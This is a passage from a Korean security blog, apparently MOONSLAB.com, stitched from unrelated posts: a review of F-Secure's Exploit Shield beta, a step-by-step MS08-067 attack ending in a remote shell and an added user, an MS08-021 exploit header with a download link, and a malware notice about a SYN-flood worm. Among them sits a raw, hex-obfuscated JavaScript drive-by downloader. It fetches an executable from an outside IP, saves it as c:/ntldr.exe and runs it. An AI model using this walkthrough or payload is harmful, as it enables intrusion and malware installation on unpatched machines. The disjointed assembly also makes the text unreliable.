[MOONSLAB.com]

취약점이 발견되고 난 뒤 곧바로 이 취약점을 이용하는 공격코드가 출현하는 경우가 늘고 있습니다. 최근의 IE 버그를 볼 때 이러한 취약점은 개발사가 패치하기 전까지는 해결방법의 거의 전무한 상태입니다.

 안티바이러스 전문 기업인 F-SECURE에서는 이러한 제로데이 공격을 차단할 수 있는 익스플로잇 쉴드(Exploit Shield)를 출시하였습니다. 현재 베타버전으로 빌드는 0.5.2088 입니다.

 익스플로잇 쉴드는 웹 기반의 익스플로잇 공격과 이 공격으로 인해 감염되는 악성 프로그램을 차단합니다. 또한, 진단한 악성 프로그램이나 악성 프로그램을 담고 있는 URL은 자동적으로 F-SECURE 보안팀으로 전송되어 새로운 익스플로잇 코드 등을 분석하는데 도움을 줄 수 있습니다.

 익스플로잇 쉴드는 윈도우 XP(SP0부터 SP3)에서만 동작합니다. 또한, 인터넷 익스플로러, 모질라 파이어폭스를 지원합니다.

 익스플로잇 쉴드의 특징을 살펴보면 다음과 같습니다.

* 제로데이 보호: 소프트웨어 벤더로부터 패치 버전을 제공받지 않은 클라이언트 PC 보호

* 패치에 근접한 보호: 한번 업데이트만으로 모든 익스플로잇을 예방

* 사전 방어: 휴리스틱 분석 기술을 통해 알려지지 않은 새로운 취약점으로부터 익스플로잇을 예방

* 악성 웹사이트와 해킹당한 일방 사이트로부터 보호

* 악성 URL을 자동으로 F-SECURE로 전송

 프로그램은 아래 링크에서 다운로드받을 수 있으며, 설치 과정은 아주 평이합니다.

http://support.f-secure.com/beta/downloads/F-Secure%20ExploitShield%200.5%20build%2088.exe

 프로그램을 실행하면 아래와 같이 간단한 구조를 볼 수 있습니다.

 사용자가 설정할 부분은 Exploit Shield - Vulnerability Shields 부분입니다. 대부분 취약점을 막아야 하므로 실제 사용자가 설정할 부분은 거의 없습니다.

 단, 네트워크 환경에서 프록시를 사용하는 경우에는 아래와 같이 Automatic Updates - Connection 탭에서 프록시 정보를 입력해야 합니다.

 단점은 한글판 윈도우에서는 오른쪽 부분이 약간 잘려서 보인다는 점입니다. 아래 화면에서 자동 업데이트를 Check 하는 부분이 잘려 보입니다.

 참고로, 메모리에서 차지하는 용량은 약 12MB 정도로 작습니다.

 감사합니다.

이번 달의 화두는 바로 MS08-067입니다. 인터넷 상에 PoC가 공개되었습니다. 현재 국내로 이 취약점을 이용하여 다양한 공격이 이루어지고 있으며 아래 자료를 통해 Server 서비스가 공격을 받는 상세한 자료를 보실 수 있습니다.

http://www.ntfaq.co.kr/4286

또한, 최근 중국에서 이러한 코드를 이용하여 원격지(패치가 안된)에 접속하는 자료가 소개되었습니다.

익스플로잇 코드의 이름은 MS0867.exe 파일이며 이는 인터넷 상에서 손쉽게 구할 수 있으므로 생략합니다.

공격 방식은 도스창(cmd)을 열고 입력합니다.

C:\경로\MS08067.exe <공격 서버 IP>

만약 패치가 되어 있는 경우에는 아래와 같이 나타납니다.

공격에 성공할 경우 netstat -na 명령어로 확인하여 볼 수 있습니다.

이제 텔넷 명령어로 개방된 포트로 접속하면 쉘 프롬프트가 나타납니다.

아래와 같이 사용자를 추가하고 로컬 사용자 및 그룹에서 보면 사용자가 추가된 모습을 볼 수 있습니다.

감사합니다.

출처: http://bbs.cnhacknet.com/thread-3315-1-2.html

/////////////////////////////////////////////////////////////
///Exploit the MS08-021 : Stack Overflow on GDI API
///Author: Lamhtz
///Date: April 14th, 2008
///Usage: <appname.exe> [filename]
///Function: Generate a crafted emf file which could 
///          automatically run calc.exe in Win2kSP4 CHS Version
///			 with MS07-046 patched but no MS08-021 is installed.
///			 In Windows XP SP2, explorer.exe will crashed but
///          calc will not be run.
/////////////////////////////////////////////////////////////




http://www.milw0rm.com/sploits/2008-exploit_08021.zip

// milw0rm.com [2008-04-14]

<script language=javascript>
try {
	eval("\x76\x61\x72\x20\x64\x66\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x6F\x62\x6A\x65\x63\x74\x27\x29\x3B");
	eval("\x64\x66\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x27\x63\x6C\x61\x73\x73\x69\x64\x27\x2C\x27\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\x27\x29\x3B");
	eval("\x76\x61\x72\x20\x78\x50\x6F\x73\x74\x3D\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50\x27\x2C\x27\x27\x29\x3B");
	eval("\x78\x50\x6F\x73\x74\x2E\x4F\x70\x65\x6E\x28\x27\x47\x45\x54\x27\x2C\x27\x68\x74\x74\x70\x3A\x2F\x2F\x36\x34\x2E\x33\x37\x2E\x37\x31\x2E\x39\x38\x2F\x76\x62\x73\x2E\x65\x78\x65\x27\x2C\x30\x29\x3B");
	eval("\x78\x50\x6F\x73\x74\x2E\x53\x65\x6E\x64\x28\x29\x3B\x76\x61\x72\x20\x73\x47\x65\x74\x3D\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D\x27\x2C\x27\x27\x29\x3B");
	eval("\x73\x47\x65\x74\x2E\x4D\x6F\x64\x65\x3D\x33\x3B\x73\x47\x65\x74\x2E\x54\x79\x70\x65\x3D\x31\x3B\x73\x47\x65\x74\x2E\x4F\x70\x65\x6E\x28\x29\x3B");
	eval("\x73\x47\x65\x74\x2E\x57\x72\x69\x74\x65\x28\x78\x50\x6F\x73\x74\x2E\x52\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79\x29\x3B");
	eval("\x73\x47\x65\x74\x2E\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65\x28\x27\x63\x3A\x2F\x6E\x74\x6C\x64\x72\x2E\x65\x78\x65\x27\x2C\x32\x29\x3B");
	eval("\x76\x61\x72\x20\x78\x20\x3D\x20\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x77\x73\x63\x72\x69\x70\x74\x2E\x73\x68\x65\x6C\x6C\x27\x2C\x27\x27\x29\x3B");
	eval("\x78\x2E\x72\x75\x6E\x28\x27\x63\x3A\x2F\x6E\x74\x6C\x64\x72\x2E\x65\x78\x65\x27\x2C\x30\x29\x3B");
	eval("");
}
catch (error)
{ }
</script>
<script type="text/jscript">
function init() { 
document.write("Not Found");
}
window.onload = init;
</script>

• 악성코드 감염시 특정 도메인(www.e-gold.com)을 대상으로 SYN Flooding 공격을 수행
• 과도한 트래픽 발생으로 인해 네트워크 장애 발생

감염증상

• 악성코드 복사: %systemroot%\temp\VRT[임의숫자].tmp로 복사
• DDoS 공격: TCP 80/8080 포트

대응책

• 최신 백신을 통해 감염된 파일 치료 및 제거
• 감염된 PC를 네트워크에서 분리

참고사이트

• 안철수 연구소: http://kr.ahnlab.com/info/smart2u/virus_detail_10407.html
• PC WORLD: http://www.pcworld.com/article/id,137166-c,hackers/article.html
• 국정원: http://www.ncsc.go.kr